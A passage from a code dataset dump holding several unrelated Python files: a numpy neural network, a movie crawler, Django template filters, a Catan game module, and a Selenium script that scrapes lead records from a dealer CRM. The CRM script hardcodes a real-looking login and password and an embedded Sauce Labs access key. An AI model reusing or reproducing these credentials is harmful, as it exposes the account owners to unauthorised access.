assert isinstance(statement, (String, Variable, Function, Tag))\n if spaces: statement.spaces = spaces\n self.statements.append(statement)\n\n def __str__(self):\n return self.spaces + \"\".join(\n str(statement) for statement in self.statements)\n","sub_path":"dsc/tools/ast.py","file_name":"ast.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"438758883","text":"import numpy as np\n\n#red de 14 entadas, capa oculta de 8 nodos y una nodo de salida\nclass NeuralNet():\n\n def __init__(self, capas=[14, 7, 1], ratio_aprendizaje=0.001, iterations=4100):\n self.parametros = {} #aca se guardaran los pesos y bias\n self.capas = capas\n self.ratio_aprendizaje = ratio_aprendizaje\n self.iterations = iterations\n # self.perdida = []\n self.X = None\n self.y = None\n\n def init_pesos(self):\n # inicializar los pesos de una distribucion normal aleatoria\n\n np.random.seed(1) # inicializamos semilla aleatoria(número utilizado para inicializar un generador de números pseudoaleatorios)\n self.parametros[\"W1\"] = np.random.randn(self.capas[0], self.capas[1])# esta matriz de peso tendra un peso de 14 x 7\n self.parametros['b1'] = np.random.randn(self.capas[1], ) # primero bias sera un vector de tamaño 7 porque tiene 7 nodos ocultos\n self.parametros['W2'] = np.random.randn(self.capas[1], self.capas[2]) # la segunda matriz de pesos sera de 7 x 1 porque tiene 7 nodos ocultos y un nodo de salida\n self.parametros['b2'] = np.random.randn(self.capas[2], ) # solo un tamño porque solo hay ua salida\n\n def relu(self, Z):\n\n # El relu realiza una operacion umbral a cada elemento donde los valores menores que 0 se establecen en 0\n #esto realiza un relu para matrices porque principalmente estara lidiando con arrays y no valores unicos\n return np.maximum(0, Z)\n\n def sigmoide(self, Z):\n #La función sigmoide toma números reales en cualquier rango y los comprime a una salida de valor real entre 0 y 1.\n\n return 1.0 / (1.0 + np.exp(-Z))\n\n def entropia_cruzada(self, y, yhat):\n nsample = len(y)\n perdida = -1 / nsample * (np.sum(np.multiply(np.log(yhat), y) + np.multiply((1 - y), np.log(1 - yhat + 0.000001))))\n return perdida\n\n def forward_propagation(self):\n\n #Realiza la propagación hacia adelante.\n\n Z1 = self.X.dot(self.parametros['W1']) + self.parametros['b1']\n A1 = self.relu(Z1)\n Z2 = A1.dot(self.parametros['W2']) + self.parametros['b2']\n y_calculada = self.sigmoide(Z2)\n perdida = self.entropia_cruzada(self.y, y_calculada)\n\n # guardar los valores calcualdos\n self.parametros['Z1'] = Z1\n self.parametros['Z2'] = Z2\n self.parametros['A1'] = A1\n\n return y_calculada, perdida\n\n def back_propagation(self, y_calculada):\n #Calcula los derivados y actualiza los pesos y bias.\n\n def dRelu(x):\n x[x <= 0] = 0\n x[x > 0] = 1\n return x\n\n # calculamos las derivadas\n derivada_perdida_respecto_a_y_calculada = -(np.divide(self.y, y_calculada) - np.divide((1 - self.y), (1 - y_calculada + 0.000001)))\n derivada_perdida_respecto_a_sig = y_calculada * (1 - y_calculada)\n derivada_perdida_respecto_a_z2 = derivada_perdida_respecto_a_y_calculada * derivada_perdida_respecto_a_sig\n\n derivada_perdida_respecto_a_A1 = derivada_perdida_respecto_a_z2.dot(self.parametros['W2'].T)\n derivada_perdida_respecto_a_w2 = self.parametros['A1'].T.dot(derivada_perdida_respecto_a_z2)\n derivada_perdida_respecto_a_b2 = np.sum(derivada_perdida_respecto_a_z2, axis=0)\n\n derivada_perdida_respecto_a_z1 = derivada_perdida_respecto_a_A1 * dRelu(self.parametros['Z1'])\n derivada_perdida_respecto_a_w1 = self.X.T.dot(derivada_perdida_respecto_a_z1)\n derivada_perdida_respecto_a_b1 = np.sum(derivada_perdida_respecto_a_z1, axis=0)\n\n # actualizar los pesos y bias\n self.parametros['W1'] = self.parametros['W1'] - self.ratio_aprendizaje * derivada_perdida_respecto_a_w1\n self.parametros['W2'] = self.parametros['W2'] - self.ratio_aprendizaje * derivada_perdida_respecto_a_w2\n self.parametros['b1'] = self.parametros['b1'] - self.ratio_aprendizaje * derivada_perdida_respecto_a_b1\n self.parametros['b2'] = self.parametros['b2'] - self.ratio_aprendizaje * derivada_perdida_respecto_a_b2\n\n def entrenar(self, X, y):\n #Entrena la red neuronal usuando la data y etiquetas\n\n self.X = X\n self.y = y\n self.init_pesos() # inicializar pesos y bias\n\n for i in range(self.iterations):\n y_calculada, perdida = self.forward_propagation()\n self.back_propagation(y_calculada)\n\n # self.perdida.append(perdida)\n\n def predecir(self, X):\n\n Z1 = X.dot(self.parametros['W1']) + self.parametros['b1']\n A1 = self.relu(Z1)\n Z2 = A1.dot(self.parametros['W2']) + self.parametros['b2']\n prediccion = self.sigmoide(Z2)\n # redondear la prediccion\n return np.round(prediccion)\n\n def exactitud(self, y, y_calculada):\n #calcular exactitud de los resulatdos calculado con las etiquetas reales\n\n acc = int(sum(y == y_calculada) / len(y) * 100)\n return acc","sub_path":"neural_network.py","file_name":"neural_network.py","file_ext":"py","file_size_in_byte":4942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"521003966","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom movie import Movie\n\ntry:\n from HTMLParser import HTMLParser\n from urlparse import urljoin, urldefrag\nexcept ImportError:\n from html.parser import HTMLParser\n from urllib.parse import urljoin, urldefrag\n\nURL = 'http://movie.douban.com/top250'\nheader = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'\n}\n\n\ndef download_page(url):\n data = requests.get(url, headers=header).content\n return data\n\n\ndef parse_html(html):\n soup = BeautifulSoup(html, \"html.parser\", from_encoding=\"utf-8\")\n movies_soup = soup.find(\"ol\", attrs={\"class\", \"grid_view\"})\n movie_list = []\n for li in movies_soup.find_all(\"li\"):\n # print li\n detail = li.find(\"div\", attrs={\"class\": \"hd\"})\n url = detail.find(\"a\").get(\"href\")\n name = detail.find(\"span\", attrs={\"class\": \"title\"}).getText()\n movie = Movie(url, name)\n movie_list.append(movie)\n\n next_page = soup.find(\"span\", attrs={\"class\": \"next\"}).find(\"a\")\n if next_page:\n return movie_list, URL + next_page[\"href\"]\n return movie_list, None\n\n\ndef write_to_excel():\n import xlwt\n wbk = xlwt.Workbook()\n sheet = wbk.add_sheet(\"sheet 1\")\n sheet.write(0, 1, 'tets')\n wbk.save(\"pytest.xls\")\n\nif __name__ == \"__main__\":\n write_to_excel()\n # html = download_page(URL)\n # url = URL\n # while url:\n # movie_list, url = parse_html(html)\n","sub_path":"net/doupan_crawler.py","file_name":"doupan_crawler.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"270792036","text":"from django.template import Library\nregister = Library()\n\n# returns True if post_tree_element is indent\n@register.filter\ndef is_indent( post_tree_element ):\n indent_prefix = 'in-'\n if type(post_tree_element) is not str:\n return False\n elif post_tree_element.startswith(indent_prefix):\n return True\n else:\n return False\n\n# returns True if post_tree_element is dedent\n@register.filter\ndef is_dedent( post_tree_element ):\n dedent_prefix = 'out-'\n if type(post_tree_element) is not str:\n return False\n elif post_tree_element.startswith(dedent_prefix):\n return True\n else:\n return False\n\n@register.filter\ndef get_dent_node_depth( text ):\n indent_prefix = 'in-'\n dedent_prefix = 'out-'\n if text.startswith(indent_prefix):\n depth = int(text[len(indent_prefix):])\n elif text.startswith(dedent_prefix):\n depth = int(text[len(dedent_prefix):])\n return depth\n\n# Usage (in template):\n# {{ post|post_upvoted_by_user:user_pk }}\n#\n# Results with the HTML:\n# True\n@register.filter\ndef post_upvoted_by_user(post,user_pk):\n return post.upvoters.filter(id=user_pk).exists()\n\n# Usage (in template):\n# {{ post|post_downvoted_by_user:user_pk }}\n# Results with the HTML:\n# True\n@register.filter\ndef post_downvoted_by_user(post,user_pk):\n return post.downvoters.filter(id=user_pk).exists()\n","sub_path":"mySite/MCPost/templatetags/MCPost_templatetags.py","file_name":"MCPost_templatetags.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"55251236","text":"#!/usr/bin/env python\n\n\n#=============================== YOUR CODE HERE ===============================\n# Instructions: complete the currently empty RandomizedRoadmapPlanner class.\n# An instance of this class will be created by the path_planner\n# node. It should maintain a graph of points and the connections\n# between them.\n# The 'plan()' function should find a path between the requested\n# points, inserting new nodes and edges if necessary. Make sure\n# that it stops at some point in time if no path between the\n# points exists.\n#randomized_roadmap_planner.py\n# Remark: it will be necessary to test points and line segments for emptiness.\n# The class is (as usual) ROS-independent, so the actual mechanism of\n# performing these tests is abstracted by two callback functions, which\n# the object receives during the construction. In order to test whether\n# e.g. the point (1, 4) is free you should do:\n#\n# free = self.point_free_cb((1, 4))\n#\n# Hint: use the standard function 'math.uniform()' to generate the coordinates\n# for random points.\n#\n# Hint: if you decided to use 'pygraph' library for graph and search\n# implementations, make sure that the graph object is stored in a member\n# field called 'graph'. If this is the case, the nodes and edges of the\n# graph will be automatically visualized by the path_planner node after\n# each planning request.\n\nclass RandomizedRoadmapPlanner:\n\n def __init__(self, point_free_cb, line_free_cb, dimensions):\n \"\"\"\n Construct a randomized roadmap planner.\n\n 'point_free_cb' is a function that accepts a point (two-tuple) and\n outputs a boolean value indicating whether the point is in free space.\n\n 'line_free_cb' is a function that accepts two points (the start and the\n end of a line segment) and outputs a boolen value indicating whether\n the line segment is free from obstacles.\n\n 'dimensions' is a tuple of tuples that define the x and y dimensions of\n the world, e.g. ((-8, 8), (-8, 8)). It should be used when generating\n random points.\n \"\"\"\n self.point_free_cb = point_free_cb\n self.line_free_cb = line_free_cb\n self.dimensions = dimensions\n self.point_count=0\n self.path_graph=graph()\n\n def plan(self, point1, point2):\n \"\"\"\n Plan a path which connects the two given 2D points.\n\n The points are represented by tuples of two numbers (x, y).\n\n Return a list of tuples where each tuple represents a point in the\n planned path, the first point is the start point, and the last point is\n the end point. If the planning algorithm failed the returned list\n should be empty.\n \"\"\"\n path=[]\n # initialising the start and end points\n self.point_count=self.point_count+1\n start_point=self.point_count\n self.path_graph.add_node(self.point_count, attrs=[('position', (point1[0], point1[1]))])\n self.point_count=self.point_count+1\n end_point=self.point_count\n self.path_graph.add_node(self.point_count, attrs=[('position', (point2[0], point2[1]))])\n\n #calculating the distance between two points\n distance=math.sqrt(math.pow(point1[0]-point2[0],2)+math.pow(point1[1]-point2[1],2))\n #calculating the heuresic value for A*\n h=euclidean()\n path_point=heuristic_search(self.path_graph, start_point, end_point, h)\n for i in path_point:\n x = self.path_graph.node_attributes(i)\n path.append(x[0][1]) \n \n\n\n \n\n return list()\n\n def remove_edge(self, point1, point2):\n \"\"\"\n Remove the edge of the graph that connects the two given 2D points.\n\n The points are represented by tuples of two numbers (x, y).\n\n Has an effect only if both points have a corresponding node in the\n graph and if those nodes are connected by an edge.\n \"\"\"\n pass\n\n#==============================================================================\n","sub_path":"amr_navigation/src/amr_navigation/randomized_roadmap_planner.py","file_name":"randomized_roadmap_planner.py","file_ext":"py","file_size_in_byte":4187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"651293268","text":"import numpy as np\n\nimport matplotlib.pyplot as plt\n\nimport zlib, sys\nimport statsmodels.api as sm\n\n\n\n\n\nclass Automaton():\n def __init__(self, args, rule, mid=[]):\n self.rule = rule\n end = [0 for _ in range(args.time+1)]\n middle = mid\n self.initial = end + middle + end \n self.state = self.initial\n \n # convert wolfram rule to list\n self.wolfram = [int(x) for x in np.binary_repr(self.rule, 8)]\n #print(\"wolfram vector: \", self.wolfram)\n #print(\"initial condition:\", mid)\n self._lambda = sum(self.wolfram)/8\n \n @staticmethod \n def bin_converter(state):\n total = 0\n for index, val in enumerate(reversed(state)):\n total += (val * 2**index)\n return(total)\n \n def simulate(self, args, time):\n text = str(self.state)\n for _ in range(time):\n new_state = []\n for i in range(0, len(self.state)):\n new_state.append(self.wolfram[7-Automaton.bin_converter([self.state[i-1], self.state[i], self.state[(i+1)%len(self.state)]])])\n self.state = new_state\n text = str(self.state)\n compressed_text = zlib.compress(bytes(text, \"utf-8\"), args.rate)\n self.compressed = sys.getsizeof(compressed_text)\n self.uncompressed = sys.getsizeof(bytes(text, \"utf-8\"))\n \n \ndef gros_grey(n):\n L = [[0], [1]]\n for _ in range(n-1):\n Lp = L[::-1]\n L = [[0]+a for a in L]\n Lp = [[1]+a for a in Lp]\n L = L+Lp\n L = [a+[1] for a in L]\n return L\n \ndef lyapunov(x, y):\n lambdas = []\n s = 0\n aut1 = Automaton(args, args.rule, x)\n aut2 = Automaton(args, args.rule, y)\n for t in range(1, args.time+1):\n aut1.simulate(args, 1)\n aut2.simulate(args, 1)\n c1, c2 = aut1.compressed, aut2.compressed\n s += abs(c1-c2)\n #print(abs(c1-c2))\n #lambdas.append(s/t)\n lambdas.append(abs(c1-c2))\n return lambdas\n\n\n\ndef regression(data):\n X = sm.add_constant([i+1 for i in range(len(data))])\n model = sm.OLS(data, X).fit()\n pred_val = model.fittedvalues.copy()\n print(model.params)\n return model.params[1], pred_val\n\ndef cnt(args, t, inits):\n s = 0\n aut1 = Automaton(args, args.rule, inits[0])\n aut1.simulate(args, t)\n c1 = aut1.compressed\n for i in range(len(inits)-1): \n c2 = c1 \n aut1 = Automaton(args, args.rule, inits[i+1])\n aut1.simulate(args, t)\n c1 = aut1.compressed\n s += abs(c2-c1)\n cnt = s/(len(inits)-1)\n return cnt\n \n \nif __name__ == \"__main__\":\n import argparse\n\n # Parse arguments\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--time\", default=1500, type=int, help=\"Number of time steps.\")\n parser.add_argument(\"--len\", default=100, type=int, help=\"Length of initial state if random is true.\")\n parser.add_argument(\"--rule\", default=22, type=int, help=\"Wolfram elementary cellular automaton rule.\")\n parser.add_argument(\"--rate\", default=1, type=int, help=\"Stupen komprese: 0-9\")\n args = parser.parse_args()\n \n c1, c2 = 4, 5\n N = 5\n T = 120\n L = gros_grey(N)\n c = []\n for t in range(T):\n print(\"time: \", t+1)\n c.append(cnt(args, t, L))\n print(c)\n \n slope, pred_val = regression(c)\n plt.plot([i for i in range(T)], c)\n plt.plot([i for i in range(T)], pred_val)\n plt.title(\"Rule: {}, number of initial conditions: {}, slope: {:.3f}\".format(args.rule, len(L), slope))\n plt.xlabel(\"time steps\")\n # plt.ylabel(r'$\\delta_n$')\n #plt.axis('equal')\n plt.show()\n\n\n \n #for i in range(5):\n # cond1, cond2 = c1+i, c2+i\n # x = L[cond1]\n # y = L[cond2]\n # approx = lyapunov(x, y)\n # slope, pred_val = regression(approx)\n # plt.plot([i for i in range(args.time)], approx)\n # plt.plot([i for i in range(args.time)], pred_val)\n # plt.title(\"Rule: {}, initial conditions: {}, {}, slope: {:.3f}\".format(args.rule, cond1, cond2, slope))\n # plt.xlabel(\"time steps\")\n # plt.ylabel(r'$\\delta_n$')\n #plt.axis('equal')\n # plt.show()\n\n\n\n \n\n\n","sub_path":"one_dim/lyapunov_true.py","file_name":"lyapunov_true.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"219118288","text":"# This file contains player-related classes.\n\nfrom enum import Enum, unique\nfrom collections import Counter\nimport re\nimport random\n\n@unique\nclass Resource(Enum):\n DESERT = 0\n BRICK = 1\n GRAIN = 2\n LUMBER = 3\n ORE = 4\n WOOL = 5\n \n def __str__(self):\n return self.name.lower()\n\ndef ResourceFromString(s):\n if not s:\n return None\n s = s.upper()\n for r in Resource:\n # We accept the full name with any capitalization (e.g. 'wool', 'WOOL',\n # 'wOoL', etc.) or the first letter ('w' for WOOL).\n if r.name == s or r.name[0] == s[0]:\n return r\n return None\n\n@unique\nclass DevCard(Enum):\n KNIGHT = 1\n ROAD_BUILDING = 2\n YEAR_OF_PLENTY = 3\n MONOPOLY = 4\n \n def __str__(self):\n return self.name.lower()\n\n\n@unique\nclass Color(Enum):\n RED = 1\n BLUE = 2\n ORANGE = 3\n WHITE = 4\n BLACK = 5\n GREEN = 6\n \n def __str__(self):\n return self.name.lower()\n\ndef ColorFromString(s):\n if not s:\n return None\n s = s.upper()\n for r in Color:\n # We accept the full name with any capitalization (e.g. 'red', 'RED',\n # 'ReD', etc.).\n if r.name == s:\n return r\n return None\n\ndef inResource(prompt):\n p = re.compile(r'(\\d+)\\s*(\\w+)')\n while True:\n s = input(prompt)\n match = p.match(s)\n if not match:\n print(\"Invalid resource format. Expected '' (like '4w' for 4 wool).\")\n continue\n n = int(match.group(1))\n if n < 0:\n print(\"Invalid number: '{}'\".format(match.group(1)))\n continue\n r = ResourceFromString(match.group(2))\n if r is None or r == Resource.DESERT:\n print(\"Invalid resource: '{}'\".format(match.group(2)))\n continue\n break\n return (n, r)\n\ndef inValLoc(prompt):\n p = re.compile(r\"(\\d\\d?)\\s*,\\s*(\\d\\d?)\")\n while True:\n s = input(prompt)\n match = p.match(s)\n if not match:\n print(\"Invalid format. Format must be 'x,y'\")\n continue\n x = int(match.group(1))\n if x < 0 or x > 10:\n print(\"Invalid x coordinate. x must be in the range [0, 10].\")\n continue\n y = int(match.group(2))\n if y < 0 or y > 16:\n print(\"Invalid y coordinate. y must be in the range [0, 16].\")\n continue\n break\n return (x, y)\n\ndef inValRoll(inroll):\n while True:\n roll = int(input(inroll))\n if roll not in [2,3,4,5,6,7,8,9,10,11,12]:\n print(\"Sorry, not a valid dice roll\")\n continue\n else:\n break\n return roll\n\ndef inAction(prompt):\n while True:\n uprompt = input(prompt)\n if uprompt not in [\"build\", \"trade\", \"ask\", \"devcard\", \"end\"]:\n print(\"You can only build, trade, ask, play a devcard, or end\")\n continue\n else:\n break\n return uprompt\n\n\nclass Player:\n def __init__(self, color, board):\n self.color = color # this player's color\n self.board = board # reference to the CatanBoard object\n self.hand = Counter({Resource.BRICK:4, Resource.LUMBER:4, Resource.WOOL:2, Resource.GRAIN:2}) # the resources this player has (currently set to a default hand)\n self.unplayedCards = 0 # unplayed development cards. Should be dict of Card:probability that they have it\n self.playedCards = [] # played development cards\n self.victoryPoints = 0 # maybe can contain decimals to represent probability\n self.longestRoad = False\n self.largestArmy = False\n self.remaining = Counter() # unplayed roads, settlements, and cities that this player has in their inventory\n\n def updateVPs(self): # do I need this function? could update for each action\n newVP = 0\n for node in self.nodes.values():\n newVP += node.structure\n for card in self.cards:\n if card == 'VP':\n newVP += 1\n elif card == 'Longest Road' or card == 'Largest Army':\n newVP += 2\n self.victoryPoints = newVP\n\n\nclass Human(Player):\n def __init__(self, color, board):\n Player.__init__(self, color, board)\n\n def initPlace(self):\n validSetts = self.board.validInitSetPlace()\n setLoc = inValLoc(\"Location of Placed Settlement: \")\n while setLoc not in validSetts:\n setLoc = inValLoc(\"Location of Placed Settlement: \")\n neighbors = list(self.board.nodelist[setLoc].neighbors.keys())\n possRoads = [loc for loc in self.board.nodelist if self.board.nodelist[loc] in neighbors]\n print(\"Possible Road Directions: {}\".format(possRoads))\n setRd = inValLoc(\"Location of road end: \")\n while setRd not in possRoads:\n setRd = inValLoc(\"Location of road end: \")\n self.board.buildSettle(self.color, setLoc)\n self.board.buildRoad(self.color, setLoc, setRd)\n\n def build(self):\n while True:\n uprompt = input(\"city, settlement, road, or devcard?: \")\n if uprompt not in [\"city\", \"settlement\", \"road\", \"devcard\"]:\n print(\"can only build a city, settlement, road, or devcard\")\n continue\n else:\n break\n if uprompt == \"city\":\n loc = inValLoc(\"What location? (x,y)\")\n city = {Resource.ORE:3, Resource.GRAIN:2}\n self.hand.subtract(city)\n self.board.buildCity(loc)\n elif uprompt == \"settlement\":\n loc = inValLoc(\"What location? (x,y)\")\n settlement = {Resource.BRICK:1, Resource.LUMBER:1, Resource.WOOL:1, Resource.GRAIN:1}\n self.hand.subtract(settlement)\n self.board.buildSettle(self.color, loc)\n elif uprompt == \"road\":\n fromL = inValLoc(\"From which location? (x,y)\")\n toL = inValLoc(\"To which location? (x,y)\")\n road = {Resource.BRICK:1, Resource.LUMBER:1}\n self.hand.subtract(road)\n self.board.buildRoad(self.color, fromL, toL)\n elif uprompt == \"devcard\":\n devcard = {Resource.ORE:1, Resource.GRAIN:1, Resource.WOOL:1}\n self.hand.subtract(devcard)\n self.unplayedCards += 1\n\n def trade(self):\n p = re.compile(r'(\\d+)\\s*(\\w+)')\n maritime = False\n while True:\n s = input(\"Who is {} trading with (enter 'maritime' for maritime trades)? \".format(self.color)).strip()\n if s.lower() == \"maritime\":\n maritime = True\n break\n c = ColorFromString(s)\n if c is None:\n print(\"Invalid color.\")\n continue\n break\n if maritime:\n # TODO: Implement maritime trade.\n print(\"Maritime trade not supported yet.\")\n else:\n nSelf, rSelf = inResource(\"What is {} trading? \".format(self.color.name.lower()))\n nThem, rThem = inResource(\"What is {} trading? \".format(c.name.lower()))\n # TODO\n\n def playDevcard():\n while True:\n dcard = input(\"What card? Knight, Road Building, Year of Plenty, or Monopoly: \")\n if dcard not in [\"Knight\", \"Road Building\", \"Year of Plenty\", \"Monopoly\"]:\n print(\"can only play a Knight, Road Building, Year of Plenty, or Monopoly\")\n continue\n else:\n break\n if dcard == \"Knight\":\n self.unplayedCards -= 1\n self.playedCards.append(DevCard.KNIGHT)\n #TODO add robber moves\n elif dcard == \"Road Building\":\n for n in range(2):\n fromL = inValLoc(\"From which location? (x,y)\")\n toL = inValLoc(\"To which location? (x,y)\")\n self.board.buildRoad(self.color, fromL, toL)\n #TODO finish other dev cards\n # elif dcard == \"Year of Plenty\":\n # elif dcard == \"Monopoly\":\n\n def playTurn(self):\n print(\"\")\n print(\"Current Turn: {}\".format(self.color))\n roll = inValRoll(\"What did they roll?: \")\n self.board.payout(roll)\n action = None\n while action != \"end\":\n action = inAction(\"What Action? (build, trade, ask, devcard, end): \")\n if action == \"build\":\n self.build()\n elif action == \"trade\":\n self.trade()\n elif action == \"ask\":\n # TODO\n pass\n elif action == \"devcard\":\n self.playDevcard()\n #TODO add check board state for longest road/largest army. (and winner?)\n print(\"Ending Turn\")\n\n\nclass Computer(Player):\n def __init__(self, color, board):\n Player.__init__(self, color, board)\n\n def initPlace(self):\n # TODO: Make this a real function. Currently does random selection\n validSetts = self.board.validInitSetPlace()\n print(\"BEEP BOOP BEEP BOOP\")\n print(\"A.A.R.O.N. IS THINKING\")\n print(\"A.A.R.O.N. Completed Initial Placement\")\n nodeChoice = random.choice(validSetts)\n neighbors = list(self.board.nodelist[nodeChoice].neighbors.keys())\n possRoads = [loc for loc in self.board.nodelist if self.board.nodelist[loc] in neighbors]\n roadChoice = random.choice(possRoads)\n self.board.buildSettle(self.color, nodeChoice)\n self.board.buildRoad(self.color, nodeChoice, roadChoice)\n\n def playTurn(self):\n # TODO: Need to implement\n pass\n","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":9536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"384090107","text":"from nameko.rpc import rpc\nfrom model import Model, Sequential\nfrom mongokit import *\nimport datetime\nimport time\n\n\nclass Orders(Model):\n __database__ = 'test'\n __collection__ = 'example'\n structure = {\n 'order_id': int,\n 'status': str,\n 'total_price': str,\n 'coupon_price': str,\n 'express_price': str,\n 'real_price': str,\n 'payment': str,\n 'pay_status': str,\n 'order_time': int,\n 'close_time': int,\n 'is_paid': bool,\n 'is_deleted': bool,\n }\n required_fields = [\n 'order_id',\n 'status',\n 'total_price',\n 'real_price',\n 'payment',\n 'pay_status',\n 'order_time',\n 'close_time',\n 'is_paid',\n ]\n default_values = {\n 'total_price': '0',\n 'real_price': '0',\n 'coupon_price': '0',\n 'express_price': '0',\n 'is_paid': False,\n 'is_deleted': False,\n }\n indexes = [\n {\n 'fields': 'order_id',\n 'unique': True,\n }\n ]\n ignore_keys = [\n 'is_deleted',\n ]\n struct_list = [k for k in structure]\n\n\n","sub_path":"model/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"49586208","text":"import time\nfrom datetime import date\nfrom functools import reduce\nimport pandas as pd\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\n\n'''browser = webdriver.Remote(command_executor=\"http://sandel153:b1eb82d6-e29a-4ee0-a29f-a8a82ffa56d6@ondemand.saucelabs.com:80/wd/hub\",\n desired_capabilities={\"browserName\" : \"chrome\",\n \"platform\": \"Windows 10\",\n \"version\" : \"65.0\",\n })'''\noption = webdriver.ChromeOptions()\noption.add_argument(\" — incognito\")\nbrowser = webdriver.Chrome(executable_path='/usr/local/bin/chromedriver', chrome_options=option)\nbrowser.get(\"https://www.eleadcrm.com/evo2/fresh/login.asp\")\nbrowser.implicitly_wait(10)\nbrowser.maximize_window()\nbrowser.get(\"https://www.eleadcrm.com/evo2/fresh/login.asp\")\nusername = browser.find_element_by_id(\"user\")\npassword = browser.find_element_by_id(\"password\")\nusername.send_keys(\"Dealerfox\")\npassword.send_keys(\"2017eldf1\")\nlogin_attempt = browser.find_element_by_xpath(\"//*[@type='submit']\")\nlogin_attempt.click()\ndesklog_click = browser.find_element_by_xpath(\"//span[@id='tdDeskLogImage']\")\ndesklog_click.click()\niframe1 = browser.find_element_by_xpath('//iframe[contains(@id, \"Main\")]')\nbrowser.switch_to_frame(iframe1)\ntime.sleep(2)\n\nWebDriverWait(browser, 10).until(EC.presence_of_element_located((By.ID, 'Filters_chkWebUps')))\ncheck_internet = browser.find_element_by_xpath(\"//input[@id='Filters_chkWebUps']\")\ncheck_internet.click()\nWebDriverWait(browser, 10).until(EC.presence_of_element_located((By.ID, 'Filters_chkPhoneUps')))\ncheck_phone = browser.find_element_by_xpath(\"//input[@id='Filters_chkPhoneUps']\")\ncheck_phone.click()\nWebDriverWait(browser, 10).until(EC.presence_of_element_located((By.ID, 'Filters_chkCampaignUps')))\ncheck_campaign = browser.find_element_by_xpath(\"//input[@id='Filters_chkCampaignUps']\")\ncheck_campaign.click()\n\ntime.sleep(5)\nWebDriverWait(browser, 20).until(EC.presence_of_element_located((By.XPATH, '//table[@id=\"results\"]')))\nnum_customers = browser.find_elements_by_xpath('//table[@id=\"results\"]/tbody/tr')\nnum_customers = len(num_customers)\nprint(num_customers)\n\nresult = {}\nmonth = int(date.today().strftime(\"%m\"))\nday = int(date.today().strftime(\"%d\"))\nyear = int(date.today().strftime(\"%y\"))\nmonth_of_year = date.today().strftime(\"%b\")\nday_of_week = date.today().strftime(\"%a\")\ntoday = \"{}/{}/{}\".format(month, day, year)\n\nfor record in range(0, num_customers):\n if record > 0:\n WebDriverWait(browser, 20).until(\n EC.presence_of_element_located((By.ID, 'Main')))\n iframe_child = browser.find_element_by_xpath('//iframe[contains(@id, \"Main\")]')\n browser.switch_to.frame(iframe_child)\n WebDriverWait(browser, 10).until(\n EC.presence_of_element_located((By.ID, 'DataPanel_ContentMain_CustomerName_{}'.format(record))))\n script = \"document.getElementById('DataPanel_ContentMain_CustomerName_{}').scrollIntoView();\".format(record)\n browser.execute_script(script)\n temp_table = WebDriverWait(browser, 10).until(\n EC.element_to_be_clickable((By.XPATH, \"//a[@id='DataPanel_ContentMain_CustomerName_{}']\".format(record))))\n temp_table.click()\n if len(browser.window_handles) > 0:\n browser.switch_to.window(browser.window_handles[1])\n time.sleep(5)\n browser.execute_script(\n \"var i = document.getElementById('OpportunityPanel_ViewPrevOpptyLink'); if (i != null) {i.click()};\")\n source_type_panel = browser.find_elements_by_xpath(\n \"//*[@id='OpportunityPanel_ActiveOpptyPanel']/table/tbody/tr[6]/td\")\n source_type = source_type_panel[1].text.strip()\n rep_row = browser.find_elements_by_xpath(\n \"//*[@id='OpportunityPanel_ActiveOpptyPanel']/table/tbody/tr[5]/td\")\n rep_name = rep_row[1].text.split('-')[0].strip()\n source_detail_panel = browser.find_elements_by_xpath(\n \"//*[@id='OpportunityPanel_ActiveOpptyPanel']/table/tbody/tr[7]/td\")\n source_detail = source_detail_panel[1].text.strip()\n\n if 'Online Shopper' in source_detail:\n source_detail = 'Online Shopper'\n if 'Repeat' in source_detail:\n source_detail = 'Previous Customer'\n elif '|' in source_detail:\n source_detail = source_detail.split('|')\n source_detail = source_detail[-1].strip()\n if source_detail == 'Dealer Website':\n source_detail = 'Online Shopper'\n\n if source_type not in result.keys():\n result[source_type] = {}\n\n if source_detail not in result[source_type].keys():\n result[source_type][source_detail] = {'L': 1, 'A': 0, 'S': 0, 'C': 0}\n else:\n result[source_type][source_detail]['L'] += 1\n\n iframe1 = browser.find_element_by_id('tabsTargetFrame')\n browser.switch_to.frame(iframe1)\n\n oddRows = browser.find_elements_by_class_name(\"odd\")\n evenRows = browser.find_elements_by_class_name(\"even\")\n\n for i in oddRows:\n s = i.text\n s = s.split('\\n')\n s = [x for x in s if x]\n t = [i.split(' ') for i in s]\n if len(t) > 0:\n import operator\n\n flat_list = reduce(operator.add, t)\n flat_list = [x for x in flat_list if x]\n if today in flat_list and ('View' in flat_list[-2] or 'View' in flat_list[-3]):\n if 'Appointment' in s[1] :\n result[source_type][source_detail]['A'] += 1\n print(' Appointment : ',s)\n\n if today in flat_list and 'Complete' in flat_list[-2] and 'Edit' in flat_list[-1]:\n if 'Appointment' in s[1]:\n result[source_type][source_detail]['A'] += 1\n print(' Appointment : ',s)\n\n if today in flat_list and ('View' in flat_list[-2] or 'View' in flat_list[-3]):\n if 'Show' in flat_list[4] or 'Show' in flat_list[5]:\n result[source_type][source_detail]['S'] += 1\n print(' 